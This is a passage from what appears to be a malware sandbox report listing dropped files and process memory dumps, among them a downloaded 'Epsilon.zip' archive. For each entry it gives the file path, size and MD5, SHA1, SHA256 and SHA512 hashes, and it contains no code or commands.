150902c96c64f875466a9a2ca7f0c84d

SHA1
fb40cd2460cc33ca851b5c3134211db5e629b03e

SHA256
b70b60c555ad7b2e1598e3165548c2aaf25428f866bb3340bf881b81403b2437

SHA512
1f9b2d772b784b441f2b823d2cdf5280c332a8d3452deb5b26648f64eb95b263b84b7c69eb12b32e9e24f681c69d1daa1c7dbe2b24452a5fc2f52a32438a3267

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fps3qnak.323.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Epsilon.zip

Filesize
20.9MB

MD5
4ee6fe4a0107c337dfd86c2ba0c7b425

SHA1
7eb12ffea0d2ab6d4ff71d116b5c8f173ef305f6

SHA256
eb8de476c2f7de740c37704d91afa8e5c36babfd8e5e01930cb5d44685b8eb53

SHA512
badced9a33a8e16639eb8eb34db45e024d00319aefd950b26931ab70e490d99cc1e7c86e43bd634dc9e0c40651b85fe02bb5002a3b8d5706c2d5f46c67d89da8

Download Submit
C:\Users\Admin\Downloads\Epsilon.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\Epsilon\bin\modificator\showfiltersgames.cfg

Filesize
19B

MD5
a88082a7664be4f56db07c5e5112d163

SHA1
2271f7061d8e3c3f7b5f4b25b8eb09b4f92b7657

SHA256
c5b3cf05ed6e2a79e8d7305b3af7ccb5ed02918ddc7624b330ed97f41e066f02

SHA512
f2be5ddf15d61348f71da98148f2f4739d0d7025db8c3e596d502d4e9dd8427adb776554607b31365202949ac6d39c87df82d8074f1f2b2adf4d053854adb5ed

Download Submit
memory/1852-1238-0x0000021E790D0000-0x0000021E790E2000-memory.dmp

Filesize
72KB

Download
memory/4124-1239-0x000001BF35CA0000-0x000001BF35CB0000-memory.dmp

Filesize
64KB

Download
memory/4884-1240-0x0000000000400000-0x000000000045A000-memory.dmp

Filesize
360KB

Download
memory/4884-1243-0x0000000000400000-0x000000000045A000-memory.dmp

Filesize
360KB

Download
memory/5052-1126-0x00000236F3530000-0x00000236F3552000-memory.dmp

Filesize
136KB

Download